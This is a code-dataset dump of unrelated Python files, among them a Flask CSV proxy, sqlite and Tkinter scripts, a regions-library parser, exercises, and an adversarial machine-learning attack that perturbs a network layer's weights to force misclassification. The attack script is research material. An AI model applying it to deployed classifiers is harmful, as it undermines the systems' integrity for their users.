loads(msg)\n# \t\t\t\texcept:\n# \t\t\t\t\tmsg_dict = {\"message\": msg}\n# \t\t\telse:\n# \t\t\t\tmsg_dict: {\"message\": msg}\n#\n# \t\t\tif not msg_dict.get(\"method\", None):\n# \t\t\t\tmsg_dict.update({\"method\": \"\"})\n# \t\t\tif not msg_dict.get(\"info\", None):\n# \t\t\t\tmsg_dict.update({\"info\": \"\"})\n# \t\t\tif record.args:\n# \t\t\t\trecord.args.update(msg_dict)\n# \t\t\telse:\n# \t\t\t\trecord.args = msg_dict\n# \t\t\tprint(f\"##### Record Args - {record.args}\")\n# \t\treturn super(DictMessageFormatter, self).formatMessage(record)\n","sub_path":"latte/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"504515093","text":"## l2_attack.py -- attack a network optimizing for l_2 distance\n##\n## Copyright (C) 2016, Nicholas Carlini .\n##\n## This program is licenced under the BSD 2-Clause licence,\n## contained in the LICENCE file in this directory.\n\nimport sys\nimport tensorflow as tf\nimport numpy as np\nfrom numpy import linalg as LA\n\nBINARY_SEARCH_STEPS = 30 # number of times to adjust the constant with binary search\nMAX_ITERATIONS = 10000 # number of iterations to perform gradient descent\nABORT_EARLY = True # if we stop improving, abort gradient descent early\nLEARNING_RATE = 1e-2 # larger values converge faster to less accurate results\nTARGETED = True # should we target one specific class? or just be wrong?\nCONFIDENCE = 0 # how strong the adversarial example should be\nINITIAL_CONST = 1e-3 # the initial constant c to pick as a first guess\nRO = 20\nLAYERNUMBER=15\nUSEKERNEL=True\nKERNELBIAS=True\nSS = 10\n\nclass LADMML2re:\n def __init__(self, sess, model, batch_size=1, confidence=CONFIDENCE, layernum=LAYERNUMBER,\n targeted=TARGETED, learning_rate=LEARNING_RATE, s=SS,\n binary_search_steps=BINARY_SEARCH_STEPS, max_iterations=MAX_ITERATIONS,\n abort_early=ABORT_EARLY, ro=RO, use_kernel=USEKERNEL, kernel_bias=KERNELBIAS):\n \"\"\"\n The L_2 optimized attack.\n\n This attack is the most efficient and should be used as the primary\n attack to evaluate potential defenses.\n\n Returns adversarial examples for the supplied model.\n\n confidence: Confidence of adversarial examples: higher produces examples\n that are farther away, but more strongly classified as adversarial.\n batch_size: Number of attacks to run simultaneously.\n targeted: True if we should perform a targetted attack, False otherwise.\n learning_rate: The learning rate for the attack algorithm. Smaller values\n produce better results but are slower to converge.\n binary_search_steps: The number of times we perform binary search to\n find the optimal tradeoff-constant between distance and confidence.\n max_iterations: The maximum number of iterations. Larger values are more\n accurate; setting too small will require a large learning rate and will\n produce poor results.\n abort_early: If true, allows early aborts if gradient descent gets stuck.\n initial_const: The initial tradeoff-constant to use to tune the relative\n importance of distance and confidence. If binary_search_steps is large,\n the initial constant is not important.\n boxmin: Minimum pixel value (default -0.5).\n boxmax: Maximum pixel value (default 0.5).\n \"\"\"\n\n self.model = model\n self.sess = sess\n self.TARGETED = targeted\n self.LEARNING_RATE = learning_rate\n self.MAX_ITERATIONS = max_iterations\n self.BINARY_SEARCH_STEPS = binary_search_steps\n self.ABORT_EARLY = abort_early\n self.CONFIDENCE = confidence\n self.batch_size = batch_size\n self.use_kernel = use_kernel\n self.ro = ro\n self.s = s\n self.layernum = layernum\n self.kernel_bias = kernel_bias\n self.grad = self.gradient_descent(sess, model)\n\n def compare(self, x, y):\n if not isinstance(x, (float, int, np.int64)):\n x = np.copy(x)\n if self.TARGETED:\n x[y] -= self.CONFIDENCE\n else:\n x[y] += self.CONFIDENCE\n x = np.argmax(x)\n if self.TARGETED:\n return x == y\n else:\n return x != y\n\n def gradient_descent(self, sess, model):\n\n batch_size = self.batch_size\n shape = (batch_size, model.image_size, model.image_size, model.num_channels)\n\n timg = tf.Variable(np.zeros(shape), dtype=tf.float32)\n tlab = tf.Variable(np.zeros((batch_size, model.num_labels)), dtype=tf.float32)\n # and here's what we use to assign them\n assign_timg = tf.placeholder(tf.float32, shape)\n assign_tlab = tf.placeholder(tf.float32, (batch_size, model.num_labels))\n\n if not self.kernel_bias:\n\n if self.use_kernel:\n aaa = model.model.layers[self.layernum].kernel\n else:\n aaa = model.model.layers[self.layernum].bias\n\n tdelt = tf.Variable(np.zeros(aaa.shape, dtype=np.float32))\n assign_tdelt = tf.placeholder(tf.float32, aaa.shape)\n\n if self.use_kernel:\n model.model.layers[self.layernum].kernel = tdelt + model.model.layers[self.layernum].kernel\n bbb = model.model.layers[self.layernum].kernel\n else:\n model.model.layers[self.layernum].bias = tdelt + model.model.layers[self.layernum].bias\n bbb = model.model.layers[self.layernum].bias\n\n else:\n aaa = model.model.layers[self.layernum].kernel\n aaa2 = model.model.layers[self.layernum].bias\n\n tdelt_kernel = tf.Variable(np.zeros(aaa.shape, dtype=np.float32))\n assign_tdelt_kernel = tf.placeholder(tf.float32, aaa.shape)\n tdelt_bias = tf.Variable(np.zeros(aaa2.shape, dtype=np.float32))\n assign_tdelt_bias = tf.placeholder(tf.float32, aaa2.shape)\n\n model.model.layers[self.layernum].kernel = tdelt_kernel + model.model.layers[self.layernum].kernel\n model.model.layers[self.layernum].bias = tdelt_bias + model.model.layers[self.layernum].bias\n bbb = model.model.layers[self.layernum].kernel\n bbb2 = model.model.layers[self.layernum].bias\n\n output = model.predict(timg)\n l2dist_real = tf.reduce_sum(tf.square(tdelt_kernel)) + tf.reduce_sum(tf.square(tdelt_bias))\n l2dist_real = tf.sqrt(l2dist_real)\n real = tf.reduce_sum(tlab * output, 1)\n other = tf.reduce_max((1 - tlab) * output - (tlab * 10000), 1)\n\n if self.TARGETED:\n # if targetted, optimize for making the other class most likely\n loss1 = tf.maximum(0.0, other - real + self.CONFIDENCE)\n else:\n # if untargeted, optimize for making this class least likely.\n loss1 = tf.maximum(0.0, real - other + self.CONFIDENCE)\n\n wei = np.ones(batch_size)\n wei[0:self.s] = 1000.0 * wei[0:self.s]\n loss1 = loss1 * wei\n loss1 = 0.5 * tf.reduce_sum(loss1)\n\n grad_tdelt_kernel, grad_tdelt_bias = tf.gradients(loss1, [tdelt_kernel, tdelt_bias])\n\n # model.model.layers[13].kernel = model.model.layers[13].kernel - tdelt\n if not self.kernel_bias:\n if self.use_kernel:\n model.model.layers[self.layernum].kernel = aaa\n ccc = model.model.layers[self.layernum].kernel\n else:\n model.model.layers[self.layernum].bias = aaa\n ccc = model.model.layers[self.layernum].bias\n else:\n model.model.layers[self.layernum].kernel = aaa\n model.model.layers[self.layernum].bias = aaa2\n\n ccc = model.model.layers[self.layernum].kernel\n ccc2 = model.model.layers[self.layernum].bias\n\n # these are the variables to initialize when we run\n setup = []\n setup.append(timg.assign(assign_timg))\n setup.append(tlab.assign(assign_tlab))\n setup.append(tdelt_kernel.assign(assign_tdelt_kernel))\n setup.append(tdelt_bias.assign(assign_tdelt_bias))\n\n def doit(imgs, labs, z):\n\n batch = imgs[:batch_size]\n batchlab = labs[:batch_size]\n akernel = model.model.layers[self.layernum].kernel\n abias = model.model.layers[self.layernum].bias\n z1 = z[0: akernel.shape[0] * akernel.shape[1]]\n z2 = z[akernel.shape[0] * akernel.shape[1]:]\n z1 = np.reshape(z1, akernel.shape)\n z2 = np.reshape(z2, abias.shape)\n\n sess.run(setup, {assign_timg: batch, assign_tlab: batchlab, assign_tdelt_kernel: z1, assign_tdelt_bias:z2})\n aaaa, bbbb, cccc = sess.run([aaa, bbb, ccc])\n # print(LA.norm(aaaa - bbbb))\n # print(LA.norm(aaaa - cccc))\n scores, l2dist, delt_grad_kernel, delt_grad_bias = sess.run([output, l2dist_real,\n grad_tdelt_kernel, grad_tdelt_bias])\n\n delt_gradss = np.hstack((np.reshape(delt_grad_kernel, (-1)), np.reshape(delt_grad_bias, (-1))))\n return scores, l2dist, np.array(delt_gradss)\n\n return doit\n\n def attack(self, imgs, targets):\n \"\"\"\n Perform the L_2 attack on the given images for the given targets.\n\n If self.targeted is true, then the targets represents the target labels.\n If self.targeted is false, then targets are the original class labels.\n \"\"\"\n r = []\n print('go up to', len(imgs))\n for i in range(0, len(imgs), self.batch_size):\n print('tick', i)\n r.extend(self.attack_batch(imgs[i:i + self.batch_size], targets[i:i + self.batch_size]))\n return np.array(r)\n\n def attack_batch(self, imgs, labs):\n \"\"\"\n Run the attack on a batch of images and labels.\n \"\"\"\n batch_size = self.batch_size\n if self.kernel_bias:\n aab = self.model.model.layers[self.layernum].kernel\n aab2 = self.model.model.layers[self.layernum].bias\n\n o_bestl2 = 1e10\n o_bestattack = 0.0 * np.ones(aab.shape[0]*aab.shape[1] + aab2.shape[0])\n o_successrate = 0.0\n\n delt = 0.0 * np.ones(aab.shape[0]*aab.shape[1] + aab2.shape[0])\n s = 0.0 * np.ones(aab.shape[0]*aab.shape[1] + aab2.shape[0])\n\n alpha = 20\n for outer_step in range(self.BINARY_SEARCH_STEPS):\n print(outer_step, o_bestl2)\n\n temp = delt - s\n# z = np.where(np.abs(temp) ** 2 < (2.0 / self.ro), 0, temp)\n z = self.ro/(2.0 + self.ro) * temp\n\n scor, _, delt_grads = self.grad(imgs, labs, delt)\n\n eta = 1/np.sqrt(outer_step+1)\n delt = 1/(alpha / eta * imgs.shape[0] + self.ro) * \\\n ( self.ro * (z + s) + alpha / eta * imgs.shape[0] * delt - delt_grads)\n\n scores, l2, _ = self.grad(imgs, labs, delt)\n s = s + z - delt\n\n score_count = []\n for e, (sc) in enumerate(scores):\n # if e < self.s:\n if self.compare(sc, np.argmax(labs[e])):\n score_count.append(1)\n else:\n score_count.append(0)\n\n successrate = np.mean(score_count)\n\n print(successrate)\n print(l2)\n if successrate >= o_successrate:\n o_successrate = successrate\n l0s = np.count_nonzero(delt)\n o_bestl2 = l0s\n o_bestattack = delt\n scores_backup = scores\n\n return o_bestattack\n","sub_path":"l2_sidechannel_attack_v5.py","file_name":"l2_sidechannel_attack_v5.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"180208269","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, request, Response\nimport csv\nimport json\nimport os\nimport re\nimport requests\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\napp = Flask(__name__)\n\n@app.route(\"//\")\ndef dump(doc_id):\n\n CSV_URL = \"http://docs.google.com/feeds/download/spreadsheets/Export?key=%s&exportFormat=csv&gid=0\" % doc_id\n csv_file = requests.get(CSV_URL).text\n\n fields_row = int(request.args.get('fields_row', 0))\n\n fields = [re.sub(r'\\W+', '_', field.lower()) for field in csv_file.split(\"\\r\\n\")[fields_row].split(\",\")]\n reader = csv.DictReader(csv_file.split(\"\\r\\n\")[fields_row+1:], fields)\n \n response_body = json.dumps([row for row in reader])\n\n response = Response(response_body)\n response.headers['Content-type'] = 'text/json'\n\n return response\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.debug = port == 5000\n app.run(host='0.0.0.0', port=port)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"139906282","text":"# 데이터 베이스 연결하기\nimport sqlite3\n\nfilepath = \"./sql/text2.sqlite\"\nconn = sqlite3.connect(filepath)\n\n# 테이블 생성하기\ncur = conn.cursor()\n# 만약 items라는 테이블이 존재하면 지우라.\ncur.execute(\"DROP TABLE IF EXISTS items\")\ncur.execute(\"\"\"\n CREATE TABLE items(\n item_id INTEGER PRIMARY KEY,\n name TEXT,\n price INTEGER)\"\"\")\nconn.commit()\n\n# 데이터 넣기\n# cursor.execute()\ncur = conn.cursor()\ncur.execute(\"INSERT INTO items (name,price) VALUES(?,?)\", (\"Orange\",5200))\nconn.commit()\n\n# 여러데이터 연속으로 넣기\n# cursor.executemany()\ncur = conn.cursor()\ndata = [(\"Mango\",7700), (\"Kiwi\",4000), (\"Grape\",8000),(\"Peach\",9400),(\"Persimmon\",7000),(\"Banana\", 4000)]\ncur.executemany(\"INSERT INTO items (name,price) VALUES(?,?)\", data)\nconn.commit()\n\n# 4000-7000원 사이의 데이터 추출하기\n# insert하는 것 처럼 ?에 들어갈 수치를 변수로 지정해놓고\n# cursor.execute()로 쿼리문을 만들어준다.\ncur = conn.cursor()\nprice_range = (4000, 7000)\ncur.execute(\"SELECT * FROM items WHERE price >=? AND price <=?\",price_range)\n\n# cursor.fetchall()로 쿼리문의 결과에 대해 모두 출력 하게 한다.\nfr_list = cur.fetchall()\nfor fr in fr_list:\n print(fr)","sub_path":"crawling_db/sqlite_5.py","file_name":"sqlite_5.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"253259220","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport getopt\nimport sys\n\nfrom PIL import Image\n\n\ndef noising(input_filename, output_filename):\n input_image = Image.open(input_filename)\n input_image.save(output_filename, quality=100)\n pass\n\n\ndef main(args):\n input_filename = None\n output_filename = None\n\n # print('ARGV :', sys.argv[1:])\n\n options, remainder = getopt.getopt(\n sys.argv[1:], 'i:o:v',\n ['input', 'output='])\n # print('OPTIONS :', options)\n\n for opt, arg in options:\n if opt in ('-i', '--input'):\n input_filename = arg\n elif opt in ('-o', '--output'):\n output_filename = arg\n\n print('INPUT :', input_filename)\n print('OUTPUT :', output_filename)\n print('REMAINING :', remainder)\n\n if input_filename and output_filename:\n noising(input_filename, output_filename)\n else:\n print('input_filename or output_filename are None')\n\n return 0\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"watermarking/static/watermarking/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"533567012","text":"import time\r\n#import pymsgbox\r\nimport easygui\r\n\r\nprint(\"What do you want to get reminded\")\r\ntext = str(input())\r\n\r\nprint(\"In how many minutes do you want to get reminded?\")\r\ntimer = float(input())\r\nprint(\"The timer is set is\", timer, \"minute(s)\")\r\ntimer = timer *60\r\ntime.sleep(timer)\r\nprint(\"This is time for\", text)\r\n#pymsgbox.alert('ScrumPost!', 'Alert')\r\n#response = pymsgbox.prompt('Done?Click Ok')\r\neasygui.msgbox(\"Reminder Msg for SCRUM POST!\", title=\"ScrumPost\")","sub_path":"example_pgms/real_apps/timely_reminder.py","file_name":"timely_reminder.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485267582","text":"'''\nCreated on Jan 2, 2017\n\n@author: Chris\n'''\n\nfrom Tkinter import *\nfrom Tkinter import Frame\n\nfrom ttk import Treeview\nfrom ttk import Notebook\nimport os\n\n\nimport logging as log\n\nfrom src.questrade.classes import market\nimport src.questrade.classes.account as Account\nfrom src.questrade.classes.token import Token\nfrom src.questrade.enums import dictionary as qtD\n\nuserpath = os.getenv(\"HOME\")\nfullpath = userpath + '/' + 'test.log'\nlog.basicConfig(filename=(fullpath), format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\nlog.warning('----------Start of CLASSTEST')\n\nsymbolIdList = []\n\nsymbols =['AGU.TO','MX.TO','IT.TO']\nprint(symbols)\nsymbolInfo = market.Symbol(symbols)\nfor symbol in symbolInfo.symbolList:\n print(str(symbol))\n symbolIdList.append(str(symbol[qtD.Symbols.symbolId]))\n \nprint('')\nprint(str(symbolIdList))\nprint('')\nquotes = market.Quotes(symbolIdList)\nfor quote in quotes.quoteList:\n print(str(quote[qtD.Quotes.symbol]) + ' last trade price: ' + str(quote[qtD.Quotes.lastTradePrice]))\n \n\n\n\nkey = Token()\nprint(key.call_header())\nprint(key.api_server())\nprint(key.server_time())\n\n\nacct = Account.AccountList()\nprint(acct.userId)\n\n\nbalances =[]\n\nfor i in range(acct.accountQty):\n index = (i)\n print('index',index)\n print('type', acct.type[index])\n print('account', str(acct.number[index]))\n print('')\n balances.append(Account.AccountBalances(acct.number[index]))\n\n\n\nroot = Tk()\n\n\ndef OnReleaseClick(event):\n curritem = tree.selection()[0]\n statuslabel.config(text=\"you clicked on \" + tree.item(curritem,\"text\"))\n try:\n values = tree.item(curritem, \"values\")[0]\n print(values)\n except:\n print('no values for AcctId')\n \n\n\ntree = Treeview(root, height = 5)\ntree.grid(row=0,column=0)\n\n\nn = Notebook(root, height=100, width = 300)\nn.grid(row=1,column=1)\nf1 = Frame(n) # first page, which would get widgets gridded into it\nf2 = Frame(n) # second page\nn.add(f1, text='One')\nn.add(f2, text='Two')\nn.grid(row=2)\n\nf1button= Button(f1, text=\"test\", callback=None)\nf1button.grid(row=0,column=0)\n\nroot.wm_state('zoomed')\n\n\n\nprint(root.maxsize())\n\n\n \n# Inserted at the root, program chooses id:\ntree[\"columns\"] = (\"AcctId\",\"CAD\",\"USD\")\n\ntree.column(\"AcctId\", width = 100)\ntree.heading(\"AcctId\",text=\"AcctID\")\ntree.column(\"AcctId\", anchor=\"center\") \n\ntree.column(\"CAD\", width=100)\ntree.heading(\"CAD\", text=\"CAD\")\ntree.column(\"CAD\", anchor=\"center\")\n \ntree.column(\"USD\", width = 100)\ntree.heading(\"USD\",text=\"USD\")\ntree.column(\"USD\", anchor=\"center\") \n\nfor i in range(acct.accountQty):\n index = (i) \n tree.insert('', 'end', acct.type[index],text=acct.type[index], \n values=(\n acct.number[index],\n '$1,000', #+ '{:7,.2f}'.format(balances[index].combinedBalances[0]['cash']),\n '$2,000' #+ '{:7,.2f}'.format(balances[index].combinedBalances[1]['cash'])\n )\n )\n \n #tree.insert(acct.type[index], 'end',qtD.Accounts.isbilling+str(acct.number[index]), text = 'Is Billing: ' + str(acct.isBilling[index]))\n #tree.insert(acct.type[index], 'end', qtD.Accounts.isprimary+str(acct.number[index]), text = 'Is Primary: ' + str(acct.isPrimary[index]))\n #tree.insert(acct.type[index], 'end', qtD.Accounts.client_account_type+acct.number[index], text = 'Client Account Type: ' + acct.clientAccountType[index])\n\n\ntree.bind(\"\", OnReleaseClick)\n\n\ntree.column('#0',width=90)\ntree.heading('#0', text='Type')\nstatuslabel = Label(root, bd=1, relief=SUNKEN, anchor=W)\nstatuslabel.config(text='test status bar', width =75)\nstatuslabel.grid(row=3, columnspan = 2)\n\nroot.update()\nmainloop()\n\n\n \n\n","sub_path":"QuestradeAPI/src/questrade/classtest.py","file_name":"classtest.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"40660251","text":"try:\n import pprint\n import pickle\n import math as mat\nexcept ImportError:\n print(\"Incomplete libraries, unable to proceed\")\n\n#打开由fp.py生成的pickle对象文件\ntry:\n with open('data.pkl','rb') as f:\n print('Success opening data.pkl')\n try:\n user_tags = pickle.load(f)\n print('Success fetching data from file')\n except IOError:\n print('Cannot fetch data from file')\nexcept IOError:\n print('Cannot open data files')\n\nprint(user_tags)\n\nwith open('user_list.pkl','rb') as f:\n user_list = pickle.load(f)\n\nprint(user_list)\nprint(len(user_list))\n\n#Pearson相关系数\n\ndef pearson(rating1,rating2):\n sum_xy = 0\n sum_x = 0\n sum_y = 0\n sum_x2 = 0\n sum_y2 = 0\n n = 0\n for key in rating1:\n if key in rating2:\n n += 1\n x = rating1[key]\n y = rating2[key]\n sum_xy += x*y\n sum_x += x\n sum_y += y\n sum_x2 += x**2\n sum_y2 += y**2\n #无相同标签返回0值\n if n is 0:\n return 0\n #计算分母\n denominator = mat.sqrt(sum_y2 - (sum_x**2)/n) * mat.sqrt(sum_y2-(sum_y**2)/n)\n if denominator is 0:\n return 0\n else:\n return (sum_xy-(sum_x*sum_y)/n)/denominator\n\n#Minkowski Distance Function\ndef minkowski(rating1,rating2,r):\n distance = 0\n commonRatings = False\n for key in rating1:\n if key in rating2:\n distance += pow(abs(rating1[key] - rating2[key]),r)\n commonRatings = True\n if commonRatings:\n return pow(distance,1/r)\n else:\n return 0 #无相同标签\n\n","sub_path":"Finales/recomand.py","file_name":"recomand.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"9643151","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom __future__ import absolute_import, division, print_function\nfrom collections import OrderedDict\nfrom warnings import warn\n\nfrom astropy import units as u\nfrom astropy import coordinates\nfrom astropy.coordinates import BaseCoordinateFrame\nfrom astropy import log\n\n__all__ = ['ShapeList', 'Shape']\n\nfrom .. import shapes\nfrom ..core import PixCoord\nfrom .ds9.core import DS9RegionParserWarning, DS9RegionParserError\nfrom .crtf.core import CRTFRegionParserWarning, CRTFRegionParserError\n\n\nclass ShapeList(list):\n \"\"\"\n List of Shape\n \"\"\"\n def to_regions(self):\n regions = list()\n for shape in self:\n # Skip elliptical annulus for now\n if shape.region_type == 'ellipse' and len(shape.coord) > 5:\n msg = 'Skipping elliptical annulus {}'.format(shape)\n warn(msg, DS9RegionParserWarning)\n continue\n log.debug(shape)\n region = shape.to_region()\n log.debug(region)\n regions.append(region)\n return regions\n\n\nclass Shape(object):\n \"\"\"\n Helper class to represent a DS9/CRTF Region.\n\n This serves as intermediate step in the parsing process.\n\n Parameters\n ----------\n format_type : str\n File Format type\n coordsys : str\n Coordinate system\n region_type : str\n Region type\n coord : list of `~astropy.coordinates.Angle` or `~astropy.units.Quantity`\n Coordinates\n meta : dict\n Meta attributes\n composite : bool\n Composite region\n include : bool\n Include/exclude region\n \"\"\"\n\n shape_to_sky_region = {'DS9': dict(circle=shapes.CircleSkyRegion,\n ellipse=shapes.EllipseSkyRegion,\n box=shapes.RectangleSkyRegion,\n polygon=shapes.PolygonSkyRegion,\n annulus=shapes.CircleAnnulusSkyRegion,\n line=shapes.LineSkyRegion,\n point=shapes.PointSkyRegion\n ),\n\n 'CRTF': dict(circle=shapes.CircleSkyRegion,\n ellipse=shapes.EllipseSkyRegion,\n centerbox=shapes.RectangleSkyRegion,\n rotatedbox=shapes.RectangleSkyRegion,\n pol=shapes.PolygonSkyRegion,\n annulus=shapes.CircleAnnulusSkyRegion,\n line=shapes.LineSkyRegion,\n point=shapes.PointSkyRegion)\n }\n shape_to_pixel_region = {'DS9': dict(circle=shapes.CirclePixelRegion,\n ellipse=shapes.EllipsePixelRegion,\n box=shapes.RectanglePixelRegion,\n polygon=shapes.PolygonPixelRegion,\n annulus=shapes.CircleAnnulusPixelRegion,\n line=shapes.LinePixelRegion,\n point=shapes.PointPixelRegion\n ),\n\n 'CRTF': dict(circle=shapes.CirclePixelRegion,\n ellipse=shapes.EllipsePixelRegion,\n centerbox=shapes.RectanglePixelRegion,\n rotatedbox=shapes.RectanglePixelRegion,\n poly=shapes.PolygonPixelRegion,\n annulus=shapes.CircleAnnulusPixelRegion,\n line=shapes.LinePixelRegion,\n point=shapes.PointPixelRegion\n )\n }\n\n error = {'DS9': DS9RegionParserError, 'CRTF': CRTFRegionParserError}\n warning = {'DS9': DS9RegionParserWarning, 'CRTF': CRTFRegionParserWarning}\n\n def __init__(self, format_type, coordsys, region_type, coord, meta, composite, include):\n\n from . import CRTFRegionParser, DS9Parser\n self.parser = {'DS9': DS9Parser, 'CRTF': CRTFRegionParser}\n\n self.format_type = format_type\n self.coordsys = coordsys\n self.region_type = region_type\n self.coord = coord\n self.meta = meta\n self.composite = composite\n self.include = include\n\n def __str__(self):\n ss = self.__class__.__name__\n ss += '\\nFormat Type : {}'.format(self.format_type)\n if self.format_type == 'CRTF':\n ss += '\\nType : {}'.format(self.meta.get('type', 'reg'))\n ss += '\\nCoord sys : {}'.format(self.coordsys)\n ss += '\\nRegion type : {}'.format(self.region_type)\n if self.region_type == 'symbol':\n ss += '\\nSymbol : {}'.format(self.meta['symbol'])\n if self.region_type == 'text':\n ss += '\\nText : {}'.format(self.meta['string'])\n ss += '\\nCoord: {}'.format(self.coord)\n ss += '\\nMeta: {}'.format(self.meta)\n ss += '\\nComposite: {}'.format(self.composite)\n ss += '\\nInclude: {}'.format(self.include)\n ss += '\\n'\n return ss\n\n def convert_coords(self):\n \"\"\"\n Process list of coordinates\n\n This mainly seaches for tuple of coordinates in the coordinate list and\n creates a SkyCoord or PixCoord object from them if appropriate for a\n given region type. This involves again some coordinate transformation,\n so this step could be moved to the parsing process\n \"\"\"\n if self.coordsys in self.parser[self.format_type].coordsys_mapping:\n coords = self._convert_sky_coords()\n else:\n coords = self._convert_pix_coords()\n\n if self.region_type == 'line':\n coords = [coords[0][0], coords[0][1]]\n\n return coords\n\n def _convert_sky_coords(self):\n \"\"\"\n Convert to sky coords\n \"\"\"\n parsed_angles = [(x, y)\n for x, y in zip(self.coord[:-1:2], self.coord[1::2])\n if (isinstance(x, coordinates.Angle) and\n isinstance(y, coordinates.Angle))\n ]\n frame = coordinates.frame_transform_graph.lookup_name(self.coordsys)\n\n lon, lat = zip(*parsed_angles)\n if hasattr(lon, '__len__') and hasattr(lat, '__len__') and len(lon) == 1 and len(lat) == 1:\n # force entries to be scalar if they are length-1\n lon, lat = u.Quantity(lon[0]), u.Quantity(lat[0])\n else:\n # otherwise, they are vector quantities\n lon, lat = u.Quantity(lon), u.Quantity(lat)\n sphcoords = coordinates.UnitSphericalRepresentation(lon, lat)\n coords = [frame(sphcoords)]\n\n if self.region_type != 'polygon':\n coords += self.coord[len(coords * 2):]\n\n return coords\n\n def _convert_pix_coords(self):\n \"\"\"\n Convert to pixel coordinates, `regions.PixCoord`\n \"\"\"\n if self.region_type in ['polygon', 'line', 'poly']:\n # have to special-case polygon in the phys coord case\n # b/c can't typecheck when iterating as in sky coord case\n coords = [PixCoord(self.coord[0::2], self.coord[1::2])]\n else:\n temp = [_.value for _ in self.coord]\n coord = PixCoord(temp[0], temp[1])\n coords = [coord] + temp[2:]\n\n return coords\n\n def to_region(self):\n \"\"\"\n Convert to region object\n \"\"\"\n\n coords = self.convert_coords()\n log.debug(coords)\n viz_keywords = ['color', 'dashed', 'width', 'point', 'font', 'symsize', 'symsize', 'fontsize', 'fontstyle',\n 'usetex', 'labelpos', 'labeloff', 'linewidth', 'linestyle']\n\n if isinstance(coords[0], BaseCoordinateFrame):\n reg = self.shape_to_sky_region[self.format_type][self.region_type](*coords)\n elif isinstance(coords[0], PixCoord):\n reg = self.shape_to_pixel_region[self.format_type][self.region_type](*coords)\n else:\n self._raise_error(\"No central coordinate\")\n\n reg.visual = OrderedDict()\n reg.meta = OrderedDict()\n for key in self.meta.keys():\n if key in viz_keywords:\n reg.visual[key] = self.meta[key]\n else:\n reg.meta[key] = self.meta[key]\n reg.meta['include'] = self.include\n return reg\n\n def _raise_error(self, msg):\n raise self.error[self.format_type](msg)\n","sub_path":"regions/io/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"441878107","text":"'''\n20.顺时针打印矩阵\n考虑矩阵为空的情况\n参数:矩阵、圈数标记、矩阵行数、矩阵列数、最终结果\n第二个函数中的两条if判断是为了防止单行或单列的情况,当打印半圈后会重复往回打印\n'''\ndef printMatrix(matrix):\n\trows = len(matrix) - 1\n\tcols = len(matrix[0]) - 1\n\tif not matrix:\n\t\treturn None\n\tstart = 0\t\t\t#圈数标记,从0开始\n\tres = []\n\twhile start * 2 <= rows and start * 2 <= cols:\n\t\tprint_circle(matrix, start, rows, cols, res)\n\t\tstart += 1\n\treturn res\ndef print_circle(matrix, start, rows, cols, res):\n\tendR = rows - start \t#最后一行标记\n\tendC = cols - start\t\t#最后一列标记\n\tfor c in range(start, endC+1):\n\t\tres.append(matrix[start][c])\n\tfor r in range(start+1, endR+1):\n\t\tres.append(matrix[r][endC])\n\tif start < endR and start < endC:\n\t\tfor c in range(endC-1, start-1, -1):\n\t\t\tres.append(matrix[endR][c])\n\tif start < endR and start < endC:\n\t\tfor r in range(endR-1, start, -1):\n\t\t\tres.append(matrix[r][start])\nif __name__ == '__main__':\n\tarr = [[1]]\n\tarr2 = [[1,2],\n\t\t\t[3,4]]\n\tarr3 = [[1,2,3,4,5],\n\t\t\t[6,7,8,9,10],\n\t\t\t[11,12,13,14,15],\n\t\t\t[16,17,18,19,20],\n\t\t\t[21,22,23,24,25]]\n\tarr4 = [[1],[2],[3],[4]]\n\tarr5 = [[1,2,3,4,5]]\n\tprint(printMatrix(arr))\n\tprint(printMatrix(arr2))\n\tprint(printMatrix(arr3))\n\tprint(printMatrix(arr4))\n\tprint(printMatrix(arr5))\n","sub_path":"数据结构与算法/剑指offer/20.顺时针打印矩阵.py","file_name":"20.顺时针打印矩阵.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"336195634","text":"\"\"\"\nSimilar to the concept of the global keyword, which we have seen in the section above,\nwe can use the keyword nonlocal inside the inner function to explicitly access a variable\nfrom the outer (enclosed) scope in order to modify its value.\n\nNote that the nonlocal keyword was added in Python 3.x and is not implemented in Python 2.x (yet)\n\"\"\"\n\n\na_var = 'global value'\n\n\ndef outer():\n a_var = 'local value'\n print('outer before:', a_var)\n\n def inner():\n nonlocal a_var\n a_var = 'inner value'\n print('in inner():', a_var)\n\n inner()\n print(\"outer after:\", a_var)\n\nouter()\n","sub_path":"LEGB/2_LEG/2_2_nonlocal.py","file_name":"2_2_nonlocal.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"359516083","text":"from macromanx import Mouse, Keyboard, 